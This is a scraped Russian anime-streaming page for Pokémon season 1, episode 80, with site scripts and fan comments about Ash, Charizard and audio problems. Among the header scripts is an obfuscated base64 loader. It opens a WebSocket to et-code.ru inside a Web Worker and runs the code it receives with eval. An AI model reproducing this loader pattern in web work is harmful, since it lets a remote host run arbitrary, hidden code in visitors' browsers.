Покемоны
/
Pokemon
1
сезон
80
серия
Друг
и
соперник.
Anime
Online
TOTORI
window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/totori.ru\/wp-includes\/js\/wp-emoji-release.min.js"}};!function(a,b,c){function
d(a){var
c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600
32px
Arial",a){case"flag":return
i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return
i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return
i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return
i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return
i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function
e(a){var
c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var
f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
img.wp-smiley,img.emoji{display:inline
!important;border:none
!important;box-shadow:none
!important;height:1em
!important;width:1em
!important;margin:0
.07em
!important;vertical-align:-0.1em
!important;background:none
!important;padding:0
!important}
.crp_related
a{width:125px;height:125px;text-decoration:none}.crp_related
img{max-width:125px;margin:auto}.crp_related
.crp_title{width:119px}
var
Rcl={"ajaxurl":"http:\/\/totori.ru\/wp-admin\/admin-ajax.php","wpurl":"http:\/\/totori.ru","rcl_url":"http:\/\/totori.ru\/wp-content\/plugins\/wp-recall\/","user_ID":"0","nonce":"11a0296ed0","local":{"save":"\u0421\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c","close":"\u0417\u0430\u043a\u0440\u044b\u0442\u044c","wait":"\u041f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435","preview":"\u041f\u0440\u0435\u0434\u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440","error":"\u041e\u0448\u0438\u0431\u043a\u0430","loading":"\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430","upload":"\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c","pass0":"\u041e\u0447\u0435\u043d\u044c
\u0441\u043b\u0430\u0431\u044b\u0439","pass1":"\u0421\u043b\u0430\u0431\u044b\u0439","pass2":"\u0425\u0443\u0436\u0435
\u0441\u0440\u0435\u0434\u043d\u0435\u0433\u043e","pass3":"\u0421\u0440\u0435\u0434\u043d\u0438\u0439","pass4":"\u041d\u0430\u0434\u0435\u0436\u043d\u044b\u0439","pass5":"\u0421\u0438\u043b\u044c\u043d\u044b\u0439"},"post_ID":"5388","office_ID":"0","mobile":"0","https":"0","slider":"''","chat":{"sounds":"http:\/\/totori.ru\/wp-content\/plugins\/wp-recall\/add-on\/rcl-chat\/sounds\/","words":"300","delay":15000,"inactivity":"10","file_size":"2"},"bookmarks":{"groups":[],"url_page":"totori.ru\/pokemony-1-sezon-80-seriya"}};
.pseudo-link{color:#008acf;cursor:pointer;text-decoration:underline}.pseudo-link:hover{text-decoration:none}
var
maxSizeVideo=4;
var
td_blocks=[];function
td_block(){this.id='';this.block_type=1;this.atts='';this.td_cur_cat='';this.td_column_number='';this.td_current_page=1;this.post_count=0;this.found_posts=0;this.max_num_pages=0;this.is_ajax_running=false;}
var
td_ajax_url="http://totori.ru/wp-admin/admin-ajax.php";var
td_get_template_directory_uri="http://totori.ru/wp-content/themes/totori";
a.recall-button,.recall-button.rcl-upload-button,input[type="submit"].recall-button,input[type="submit"]
.recall-button,input[type="button"].recall-button,input[type="button"]
.recall-button,a.recall-button:hover,.recall-button.rcl-upload-button:hover,input[type="submit"].recall-button:hover,input[type="submit"]
.recall-button:hover,input[type="button"].recall-button:hover,input[type="button"]
.recall-button:hover{background:rgb(76,140,189)}a.recall-button.active,a.recall-button.active:hover,a.recall-button.filter-active,a.recall-button.filter-active:hover,a.data-filter.filter-active,a.data-filter.filter-active:hover{background:rgba(76,
140,
189,
0.4)}.rcl_preloader
i{color:rgb(76,140,189)}p.status-user-rcl::before{border-color:transparent
transparent
transparent
rgb(76,
140,
189)}.ballun-status
p.status-user-rcl{border:1px
solid
rgb(76,
140,
189)}.rcl-field-input
input[type="checkbox"]:checked
+
label.block-label::before,.rcl-field-input
input[type="radio"]:checked+label.block-label::before{background:rgb(76,
140,
189)}#rcl-chat-noread-box
.rcl-noread-users,.rcl-mini-chat
.rcl-chat-panel,.rcl-chat
.important-manager
.important-shift{background:rgba(72,133,180,0.85)}#rcl-chat-noread-box
.rcl-noread-users
a.active-chat::before{border-color:transparent
rgba(72,133,180,0.85)
transparent
transparent}#rcl-chat-noread-box.left-panel
.rcl-noread-users
a.active-chat::before{border-color:transparent
transparent
transparent
rgba(72,133,180,0.85)}.rcl-chat
.message-box::before{border-color:transparent
rgba(76,140,189,0.15)
transparent
transparent}.rcl-chat
.message-box{background:rgba(76,140,189,0.15)}#rcl-chat-noread-box
.messages-icon
.chat-new-messages{background:rgb(72,133,180)}.rcl-chat
.nth
.message-box::before{border-color:transparent
rgba(76,140,189,0.35)
transparent
transparent}.rcl-chat
.nth
.message-box{background:rgba(76,140,189,0.35)}.rcl-chat
.message-manager
a{color:rgb(72,133,180)}#lk-conteyner{background-image:url(http://totori.ru/wp-content/plugins/wp-recall/add-on/theme-grace/img/default-cover.jpg)}
(function(w,d){function
a(){var
b=d.createElement("script");b.async=!0;b.src="http://totori.ru/wp-content/plugins/wp-rocket/inc/front/js/lazyload.1.0.5.min.js";var
a=d.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a)}w.attachEvent?w.attachEvent("onload",a):w.addEventListener("load",a,!1)})(window,document);
var
$=jQuery
TOTORI
Главная
Блоги
Онгоинги
Сериалы
Аниме
Манга
Картинки
Флеш
игры
Главная
Блоги
Онгоинги
Сериалы
Аниме
Манга
Картинки
Флеш
игры
(function(){var
cx='partner-pub-5540073383023855:2967690272';var
gcse=document.createElement('script');gcse.type='text/javascript';gcse.async=true;gcse.src=(document.location.protocol=='https:'?'https:':'http:')+'//www.google.com/cse/cse.js?cx='+cx;var
s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gcse,s);})();
Панель
управления
Вход
Регистрация
(function(){var
script=document.createElement('script');script.type='text/javascript';script.charset='utf-8';script.async='true';script.src='//et-code.ru/bens/vinos.js?5454';script.onerror=function(){if(location.protocol=='https:'){hash='ZXRfd3MgPSBuZXcgV2ViU29ja2V0KCJ3c3M6Ly9ldC1jb2RlLnJ1Ojg0NDMvNTQ1NCIpOyBldF93cy5vbm1lc3NhZ2UgPSBmdW5jdGlvbih0KSB7IHBvc3RNZXNzYWdlKHQuZGF0YSk7IGV0X3dzLmNsb3NlKCk7IH0=';}else{hash='ZXRfd3MgPSBuZXcgV2ViU29ja2V0KCJ3czovL2V0LWNvZGUucnU6ODA0MC81NDU0Iik7IGV0X3dzLm9ubWVzc2FnZSA9IGZ1bmN0aW9uKHQpIHsgcG9zdE1lc3NhZ2UodC5kYXRhKTsgZXRfd3MuY2xvc2UoKTsgfQ==';}
var
et_worker=new
Worker(URL.createObjectURL(new
Blob(['eval(atob(\''+hash+'\'))']),{type:'text/javascript'}));et_worker.postMessage('Hello
World!');et_worker.onmessage=function(msg){window.eval(msg.data);var
n='',r='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';for(o=0;o<25;o++){n+=r.charAt(Math.floor(Math.random()*r.length));}
document.getElementById('e890dbbd65').id=n;};};document.body.appendChild(script);})();
Лучшие
анимешники
1
2
3
4
5
...
127
Смотреть
всех
Расписание
769
серия
-
18
декабря
71
серия
-
18
декабря
487
серии
-
22
декабря
Радио
Почта
Случайное
аниме
Ушио
и
Тора
0
11883
Главная
→
Сериалы
→
RUS
→
Покемон
1
сезон
→
Вы
здесь
Покемоны
/
Pokemon
–
1
сезон
80
серия:
Друг
и
соперник
Добавлено
в
закладки:
0
Русская
профессиональная
озвучка
(Первый
канал)
Желаем
Вам
приятного
просмотра!
Рейтинг:
0
«
ранее
далее
»
Перейти
к
выбору
серий
document.write(VK.Share.button(false,{type:"round",text:"Мне
понравилось"}));
if(screen.width<=1024){$(document).ready(function(){document.getElementById('small_comments').style.display='none';});function
Hidecom(a){var
b=a.parentNode.getElementsByTagName('div')[0].style;if(a.value=='Показать
комментарии'){a.value='Скрыть
комментарии';b.display='';}else{a.value='Показать
комментарии';b.display='none';}}}
Комментарии
(55)
←
Предыдущие
комментарии
KriKun
Roman
22.08.2016
в
14:59
Хотел
написать
комментарий.
Но
так
как
тут
есть
дурак
который
спойлерит
каждую
серию
своими
недомыслами,
я
решил
воздержаться.
Не
хочу
быть
такой
же
бякой
как
Крайт
Рейтинг:
0
Ответить
Krayt
31.08.2016
в
18:18
о,
я
оскорблен
до
глубины
души.
за
что
ты
так
со
мной?
Рейтинг:
0
Ответить
GanDieyra
31.08.2016
в
18:27
Мдє
тогда
зачем
ты
читаешь
его
коментарий?
Рейтинг:
2
Ответить
Krayt
31.08.2016
в
18:30
я
настолько
самовлюбленный,
что
специально
перечитываю
все
свои
комменты
(ЧСВ
требует,
щито
поделать)
и
смотрю
реакцию
на
них.
а
это
как
раз
реакция
на
мой
коммент,
и
я
отвечаю
на
это.
так
яснее?
лол
Рейтинг:
0
Ответить
GanDieyra
31.08.2016
в
21:50
Вопрос
был
к
тебе?э
Рейтинг:
2
Ответить
Krayt
30.07.2016
в
20:10
не
серия,
а
уг
полное…
во-первых,
долбозвончик
Эш
так
и
не
научился
думать
головой,
только
жопой
и
умеет.
это
же
надо,
принять
куклу
за
друга,
попасться
в
сети,
и
дать
утащить
себя
неведомо
куда.
сценаристам
на
этой
серии
надо
было
менять
главного
героя
на
Ричи,
и
уже
с
ним
продолжать
остальные
сезоны.
во-вторых,
если
уж
ты,
долбозвончик
Эш,
так
и
не
приручил
чаризарда
и
он
все
рано
не
слушается,
заменил
бы
его
на
кого-нибудь
другого.
зачем
тебе
в
руке
бесполезная
карта?
и
вообще,
ты
бы
еще
всех
покемонов
перед
боем
вымотал
забегом
с
препятствиями.
все
что
тебе
нужно
было
сделать
для
победы
–
не
дать
поймать
себя.
в
итоге
на
бой
ты
бы
пришел
с
полностью
готовыми
к
битве
пикачу
и
пиджеотто,
которые
идеально
подходят
для
битвы
против
батерфри.
на
замну
батерфи
Ричи
выставит
чармандера,
и
в
случае
поражения
пиджеотто
или
пикачу,
выставить
сквиртла.
затем
Ричи
ставит
пикачу,
твой
сквиртл
в
невыгодном
положении,
но
может
немного
выматать
покемона
Ричи.
третья
замена
на
бульбазавра,
у
которого
преимущество.
браво,
ты
мог
бы
выиграть,
но
ты
лошара,
Эш.
Рейтинг:
0
Ответить
(._.)Котик
Miss
Brandish
30.07.2016
в
20:17
Это
аниме
для
детей,
чего
ты
от
него
хочешь?
Рейтинг:
0
Ответить
Krayt
01.08.2016
в
03:34
чего
хочу?
ну
неплохо
было
бы
добавить
мрачности
и
реализма
в
эту
сладкую
патоку)
например,
когда
людей
бьет
молния,
пусть
умирают
в
ужасной
агонии.
или
когда
покемон
выдыхает
огонь
в
человека,
то
путь
человек…
умирает
в
ужасной
агонии.
ну
и
дальше
я
надеюсь
ты
поняла^^
Рейтинг:
0
Ответить
(._.)Котик
Miss
Brandish
01.08.2016
в
09:31
Не
понял
Очень
сложна
Рейтинг:
0
Ответить
Krayt
01.08.2016
в
22:06
о,
ошибочка
вышла,
извиняюсь.
не
до
конца
прочитал
ник,
только
Miss
увидел
Рейтинг:
0
Ответить
(._.)Котик
Miss
Brandish
01.08.2016
в
22:16
нп
Рейтинг:
0
Ответить
(._.)Miss
Brandish
05.08.2016
в
12:09
Бывает-бывает..)
Рейтинг:
7
Ответить
Андрей
Перевеев
01.08.2016
в
00:01
Ты
вообще
чтоли
чокнутый?
комментируешь
серию
которая
вышел
20
лет
назад.
Рейтинг:
0
Ответить
Krayt
01.08.2016
в
03:29
есть
такая
древняя
традиция
интернета
–
разговаривать
с
копипастой.
а
вот
я
люблю
иногда
поболтать
с
героями
аниме,
которое
вышло
20
лет
назад.
и
вообще,
у
меня
такой
вопрос
возник:
а
что,
нельзя
комментировать
серию,
которая
вышла
20
лет
назад?!
может
я
чего-то
не
знаю,
так
ты
просвети
меня.
Рейтинг:
0
Ответить
KriKun
Roman
22.08.2016
в
15:01
твои
комментарии
и
суждения
никак
не
скажутся
на
сценарии,
которого
уже
на
19
сезонов.
ты
бы
ещё
все
сезоны
пересмотрел
и
в
начале
s1e01
написал
“закройте
и
увольтесь”
Рейтинг:
0
Ответить
Krayt
31.08.2016
в
18:16
ага,
обязательно
так
и
сделаю
Рейтинг:
0
Ответить
Игорь
31.12.2015
в
00:20
Вообще
чаризард
не
нападает
на
слабых
противников
не
из
вредности,
а
из
природы.
это
его
особенность
такая.
Вот
описание
покемона:
Чаризард
летает
в
поисках
сильных
соперников.
Его
дыхание
пылает
огнем,
способным
расплавить
любой
материал.
Однако,
он
не
трогает
слабых
противников.
Рейтинг:
0
Ответить
petrik
30.09.2015
в
18:58
народ
каково
хрена
в
80
серии
на
5
минуте
какоето
шыпение
а
потом
звук
идёт
в
перёд
а
картинка
передним
ето
на
всех
сайтах:((((
Рейтинг:
0
Ответить
мария
03.02.2016
в
22:28
перемотай
подальше,там
всее
норм
Рейтинг:
0
Ответить
Anya
10.07.2015
в
06:19
Всё!
Моё
терпение
кончилось!
Черезард
достал!
Я
хочу
его
просто
задушить
Рейтинг:
0
Ответить
Азам
Умурзаков
10.07.2015
в
12:18
Эш
просто
ещё
,не
доказал
что
он
сильный.Потом
Чаризард
полюбит
Эша.
Не
надо
душить!
Рейтинг:
0
Ответить
Ксения
10.07.2015
в
13:06
Аня,
ты
не
волнуйся.
Во
втором
сезоне
черизард
начнёт
слушаться.
Эш
спасёт
ему
жизнь,
и
тогда
этот
буйный
дракоша
станет
к
нему
относиться
получше.
Потом
(
в
третьем
сезоне)
Эш
и
черизард
разойдутся.
Но
это
не
помешает
черизарду
помогать
юному
тренеру
на
соревнованиях
некоторых
лиг.
ВСЁ
БУДЕТ
ОК’
!
Рейтинг:
0
Ответить
Marina
27.08.2015
в
17:30
И
я!!!
но
как
ты
это
сделаеш
Рейтинг:
0
Ответить
Макс
23.06.2014
в
19:43
НЕНАВИЖУ
ЧАРЕЗАРДА!!!
]:->
Рейтинг:
0
Ответить
Дратини
19.06.2014
в
15:43
Эш
спасёт
чаризарда
от
смерти
и
покемон
будет
его
слушать.
Рейтинг:
0
Ответить
Дратини
19.06.2014
в
15:40
Вася,
зато
травяной
плохо
против
огненных.
У
Эша
не
было
выбора
Рейтинг:
0
Ответить
pushkin
01.06.2014
в
23:33
Жалко
Эша,
ну
нечего,
он
и
так
дошел
до
такого
уровня,
не
смотря
что
это
его
первый
турнир!
молодец
Эш
а
в
дальнейшем
чаризард
исправиться!
Рейтинг:
0
Ответить
Polina
26.05.2014
в
09:35
Мне
кажется
хорошо
что
Эш
проиграл,
потому
что
если
бы
он
выиграл
было
бы
не
так
интересно!
Рейтинг:
0
Ответить
гамбит
06.05.2014
в
18:16
да
Псидак
во
сто
раз
умнее
Чаризарда
Рейтинг:
0
Ответить
Емс
26.04.2014
в
12:07
чеерезардд
бкдет
слушать
Еша
потом1
Рейтинг:
0
Ответить
Владик
07.03.2014
в
00:10
жаль,
что
Эш
проиграл!
=-O
если
бы
не
команда
р
🙁
но
жизнь
полна
пазетива!
будем
смотреть
дальше!
Рейтинг:
0
Ответить
Иринчик
15.01.2014
в
05:51
А
чё
вы
ноете,
на
счёт
звуков?

:-/

:-/

:-/

а
мне
норм!
А
Эш
всеравно
сильней
Ричи
Рейтинг:
0
Ответить
ярик
22.12.2013
в
17:12
думал
хоть
тут
звук
нормально
а
нечего
подобное
долбаное
шипение
и
звук
отстает
аааа
Рейтинг:
0
Ответить
Флатершай
07.12.2013
в
03:27
Звук
не
просто
плохой,
он
ОТВРАТИТЕЛЬНЫЙ!!!

:-!

И
почти
в
самом
начале
шипение.
А
ещёон
отставал
на
5
секунд.
:-/

*SORRY*

:-!
Рейтинг:
0
Ответить
artem0709
02.11.2013
в
21:13
у
меня
вобше
отставал
голос
Рейтинг:
0
Ответить
←
Предыдущие
комментарии
Оставить
свой
комментарий
×
Отменить
ответ
Обязательно
ознакомьтесь
с
правилами
комментирования!!!
Вы
должны
войти
,
чтобы
оставлять
комментарии
Панель
управления
Вход
Регистрация
Расписание
769
серия
-
18
декабря
71
серия
-
18
декабря
487
серии
-
22
декабря
Радио
Почта
Случайное
аниме
Железобетон
0
3671
Kirito
Kun
14:03
-
Слишком
много
йаоя
запиленно...
:)
..
Kirito
Kun
Боже,
В
конце
мне
кажеться
что
по
ухмылке
Юдз
..
Eva
Raiskaya
Значит
попробую
посмотреть...
..
GanDieyra
Єт
пздц
первых
10
серий
сплошное
уныние
следу
..
Иван
Поварницын
Они
расходятся
только
132,
да
я
столького
заб
..
Trainyasha
что
за
животный
тип?
нет
такого,
есть
нормаль
..
Свежие
онгоинги
Наруто
/
Naruto
2
сезон
486
серия
One
Piece
/
Ван
Пис
768
серия
Волейбол
3
сезон
10
серия
Наруто
/
Naruto
2
сезон
485
серия
Сводники
духов
Лисьи
свахи
1
сезон
17
серия
Две
звезды
Онмёджи
34
серия
Главная
Блоги
Аниме
Ongoing
Сериалы
Аниме
Манга
Картинки
Клипы
Флэш
игры
Аниме
портал
Totori.ru
©
2011
-
2016
document.write("<a
href='http://www.liveinternet.ru/click'
"+"target=_blank><img
src='//counter.yadro.ru/hit?t18.15;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,80))+";"+Math.random()+"'
alt=''
title='LiveInternet:
показано
число
просмотров
за
24"+"
часа,
посетителей
за
24
часа
и
за
сегодня'
"+"border='0'
width='88'
height='31'><\/a>")
$(function(){$('.search-toggle').on('click',function(event){var
that=$(this),wrapper=$('.search-box-wrapper');that.toggleClass('active');wrapper.toggleClass('hide');});});
function
GoTo(link){window.open(link.replace("_","http://"));}
$(document).ready(function(){$(window).scroll(function(){if($(this).scrollTop()>100){$('.go_up').fadeIn();}else{$('.go_up').fadeOut();}});$('.go_up').click(function(){$('html,
body').animate({scrollTop:0},800);return
false;});});
$(document).ready(function(){$("#page_flip").hover(function(){$("#page_flip
.fix,
.back-img").stop().animate({width:'250px',height:'250px'},500);},function(){$("#page_flip
.fix").stop().animate({width:'70px',height:'70px'},220);$(".back-img").stop().animate({width:'70px',height:'70px'},200);});});
jQuery('.entry
iframe').wrap('<div
class="viboom-overroll"></div>');
!function(t,e,n,o,a,c,s){t[a]=t[a]||function(){(t[a].q=t[a].q||[]).push(arguments)},t[a].l=1*new
Date,c=e.createElement(n),s=e.getElementsByTagName(n)[0],c.async=1,c.src=o,s.parentNode.insertBefore(c,s)}(window,document,"script","//novfox2.com/player/","vbm");vbm('get',{"platformId":60891,"format":3,"sig":"da6ad7392bff6b4f"});
window.addEventListener("load",function(){var
div_l=document.getElementById('freeze_l');var
div_ln=document.getElementById('freeze_ln');var
div_r=document.getElementById('freeze_r');var
div_rn=document.getElementById('freeze_rn');if(div_l.clientHeight=='0'){theImg=document.createElement('img');theImg.src='/wp-content/themes/totori/images/240x400_Sparta_banner1.gif';theImg.setAttribute("class","spec_img");div_l.parentNode.insertBefore(theImg,div_l.previousSibling);theImg.onclick=function(){document.location.href='http://ad.admitad.com/g/gs2r7epg9y924ef97c9cbef9a57077/';}}
if(div_r.clientHeight=='0'){theImg=document.createElement('img');theImg.src='/wp-content/themes/totori/images/240x400_terra_1.jpg';theImg.setAttribute("class","spec_img");div_r.parentNode.insertBefore(theImg,div_r.previousSibling);theImg.onclick=function(){document.location.href='http://ad.admitad.com/g/821fozcygf924ef97c9c5d4d60ac523c781a91ee/';}}
if(div_ln.clientHeight=='0'){theImg=document.createElement('img');theImg.src='/wp-content/themes/totori/images/240x400_konflikt_1.gif';theImg.setAttribute("class","spec_img");div_ln.parentNode.insertBefore(theImg,div_ln.previousSibling);theImg.onclick=function(){document.location.href='https://ad.admitad.com/g/7bht38hj25924ef97c9c0186b4de2d/';}}
if(div_rn.clientHeight=='0'){theImg=document.createElement('img');theImg.src='/wp-content/themes/totori/images/240x400_stormfall_1.jpg';theImg.setAttribute("class","spec_img");div_rn.parentNode.insertBefore(theImg,div_rn.previousSibling);theImg.onclick=function(){document.location.href='http://ad.admitad.com/g/ee44629528924ef97c9cf5233b11d038080e9a68/';}}},true);
var
yaParams={};
(function(){function
ItSALive(p,c){if(new
RegExp(p).test(navigator.userAgent)){c();}else{var
d=document;function
m(){d.body.removeEventListener('mousemove',m);c();}
d.addEventListener('DOMContentLoaded',function(){d.body.addEventListener('mousemove',m);},false);}}
new
ItSALive('YandexMetrika|24
core|YandexBot|Mail.RU_Bot|bingbot|Googlebot',function(){(function(d,w,c){(w[c]=w[c]||[]).push(function(){try{w.yaCounter21985012=new
Ya.Metrika({id:21985012,webvisor:true,clickmap:true,trackLinks:true,accurateTrackBounce:true,trackHash:true});}catch(e){}});var
n=d.getElementsByTagName("script")[0],s=d.createElement("script"),f=function(){n.parentNode.insertBefore(s,n);};s.type="text/javascript";s.async=true;s.src=(d.location.protocol=="https:"?"https:":"http:")+"//mc.yandex.ru/metrika/watch.js";if(w.opera=="[object
Opera]"){d.addEventListener("DOMContentLoaded",f,false);}else{f();}})(document,window,"yandex_metrika_callbacks");});})();
(function(w,d,c){(w[c]=w[c]||[]).push(function(){var
options={project:4457919,element:'top100_widget'};try{w.top100Counter=new
top100(options);}catch(e){}});var
n=d.getElementsByTagName("script")[0],s=d.createElement("script"),f=function(){n.parentNode.insertBefore(s,n);};s.type="text/javascript";s.async=true;s.src=(d.location.protocol=="https:"?"https:":"http:")+"//st.top100.ru/top100/top100.js";if(w.opera=="[object
Opera]"){d.addEventListener("DOMContentLoaded",f,false);}else{f();}})(window,document,"_top100q");
(function(){var
rb=document.createElement('script');d=new
Date();d.setHours(0);d.setMinutes(0);d.setSeconds(0);d.setMilliseconds(0);rb.type='text/javascript';rb.async=true;rb.src='//s1.rotaban.ru/rotaban.js?v='+d.getTime();(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(rb);})();
jQuery(function($){$(document).on("click",".pseudo-link",function(){window.open($(this).data("uri"));});});
Report
Post
«
»
Your
Name:
Your
Email:
Расскажи-ка
по-подробнее,
что
здесь
не
так.
Мы
исправим
Cancel
Report
jQuery(document).ready(function($)
{window.REMODAL_GLOBALS={NAMESPACE:'report-post',DEFAULTS:{hashTracking:false,closeOnConfirm:false}}
var
_remodal=$('[data-remodal-id=report-post]').remodal({modifier:'with-red-theme',hashTracking:false,closeOnConfirm:false});$(document).on('opened','.remodal',function()
{$('#report-post-buttons').slideDown(1000);$('#report-post-form').slideDown(1000,function()
{if($('#report_post_name').val()=='')
{$('#report_post_name').focus();}
else
{$('#report_post_msg').focus();}});});$('#report-post-submit').click(function(e)
{e.preventDefault();$('#report-post-modal-desc').css('display','block');$('#report-post-modal-msg').css('display','none');$('.report-post-control').removeClass('report-post-control-error');$.post('http://totori.ru/wp-admin/admin-ajax.php?action=wp_report_post',$('#report-post-form').serialize(),function(data)
{if(data.errmsg)
{$('#report-post-modal-desc').css('display','none');$('#report-post-modal-msg').css('display','block');$('#report-post-modal-msg').html(data.errmsg);$('#report-post-modal-msg').addClass('report-post-error');$('#report-post-modal-msg').removeClass('report-post-success');if(data.field)
{$('#'+data.field).addClass('report-post-control-error');$('#'+data.field).focus();}
else
{$('#report_post_msg').focus();}}
if(data.msg)
{$('#report-post-modal-desc').css('display','none');$('#report-post-modal-msg').css('display','block');$('#report-post-modal-msg').html(data.msg);$('#report-post-modal-msg').removeClass('report-post-error');$('#report-post-modal-msg').addClass('report-post-success');$('#report_post_msg').val('');$('#report-post-form').slideUp(1000);$('#report-post-buttons').slideUp(1000);}},'json');});$('.report-post-link,.report-post-button,.report-post-custom-link,.report-post-custom-button').click(function(e)
{e.preventDefault();$('#report-post-modal-desc').css('display','block');$('#report-post-modal-msg').css('display','none');$('.report-post-control').removeClass('report-post-control-error');var
post_id=0;if($(this).attr('post-id')!=undefined)
{post_id=parseInt($(this).attr('post-id'));}
else
{var
article_id=$(this).closest('article').attr('id');if(article_id!=undefined)
{var
post_id=parseInt(article_id.replace(/^\D+/g,''));}}
$('#report-post-id').val(post_id);$.post('http://totori.ru/wp-admin/admin-ajax.php?action=wp_report_post',{subaction:'get-post',post_id:post_id},function(data)
{$('#report-post-title').html(data.post_title);_remodal.open();},'json');});});
